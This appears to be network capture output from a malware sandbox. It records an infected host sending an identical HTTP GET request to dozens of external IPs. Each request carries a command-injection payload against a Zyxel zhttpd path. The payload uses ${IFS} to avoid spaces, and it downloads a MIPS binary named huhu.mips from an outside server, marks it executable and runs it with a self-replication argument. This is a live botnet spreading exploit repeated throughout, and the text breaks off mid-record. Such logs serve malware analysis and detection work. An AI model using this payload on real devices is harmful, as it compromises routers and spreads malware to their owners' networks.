                                                      Feb 2, 2024 06:35:39.337035894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1144192.168.2.1454506167.57.28.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337088108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1145192.168.2.1455516143.176.252.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337138891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1146192.168.2.145896882.44.143.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337168932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1147192.168.2.144969872.153.7.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337220907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1148192.168.2.1449224124.235.189.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337250948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1149192.168.2.1438598219.155.89.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337307930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1150192.168.2.1437742167.16.19.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337351084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1151192.168.2.145521035.71.99.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337402105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1152192.168.2.145353698.230.128.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337438107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1153192.168.2.1435566170.225.202.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337486029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1154192.168.2.143650039.174.86.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337523937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1155192.168.2.1451822196.2.14.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337569952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1156192.168.2.1448512220.149.179.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337630033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1157192.168.2.1452012196.61.16.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337649107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1158192.168.2.1440406170.246.237.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337681055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1159192.168.2.1449380168.73.64.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337709904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1160192.168.2.1446964137.131.225.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337750912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1161192.168.2.1442146159.205.20.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337829113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1162192.168.2.145006625.163.123.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337851048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1163192.168.2.14386804.161.175.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337901115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1164192.168.2.1448646137.154.140.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337933064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1165192.168.2.1433380118.96.15.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337973118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1166192.168.2.145198076.84.184.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.338006973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1167192.168.2.143994814.121.139.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.338053942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1168192.168.2.144162091.15.84.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.338139057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1169192.168.2.1442426109.75.79.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.338149071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1170192.168.2.145340465.229.244.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.341537952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1171192.168.2.145161496.196.118.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.341593027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1172192.168.2.1458458115.239.40.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.341625929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1173192.168.2.1453332150.135.23.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.341653109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1174192.168.2.144945872.228.112.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.341708899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1175192.168.2.1457604210.35.214.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.341742992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1176192.168.2.1434670153.84.69.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.341767073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1177192.168.2.1459362175.54.66.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.341804981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1178192.168.2.1434680212.184.6.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.341854095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1179192.168.2.1457694170.235.102.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.341896057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1180192.168.2.1444902126.247.246.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.350914001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1181192.168.2.14445744.117.36.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.350956917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1182192.168.2.1449744137.239.68.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351016998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1183192.168.2.1438732125.115.82.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351097107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1184192.168.2.145274452.212.88.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351145983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1185192.168.2.1441558154.172.213.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351175070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1186192.168.2.143731896.134.1.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351224899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1187192.168.2.1442416152.148.231.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351270914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1188192.168.2.1454358104.196.142.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351306915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1189192.168.2.1437692100.219.156.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351377964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1190192.168.2.1449938160.229.15.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351439953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1191192.168.2.145756682.176.250.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351474047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1192192.168.2.1436118173.198.220.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351521969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1193192.168.2.143546051.123.189.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351567030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1194192.168.2.144921672.114.252.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351603985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1195192.168.2.1432990219.152.87.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351639032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1196192.168.2.1433160146.211.179.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351687908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1197192.168.2.1459598191.142.192.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351716042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1198192.168.2.1453874153.121.150.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351763010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1199192.168.2.1446486113.138.188.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351794004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1200192.168.2.14388988.178.48.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351814985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1201192.168.2.1459932196.59.147.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351840973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1202192.168.2.144795275.193.232.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351880074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1203192.168.2.143499024.96.18.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351950884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1204192.168.2.145263823.67.104.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.351989031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1205192.168.2.1450650148.192.103.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:40.352039099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1206192.168.2.1433322134.58.40.219443
                                                      TimestampBytes transferredDirectionData
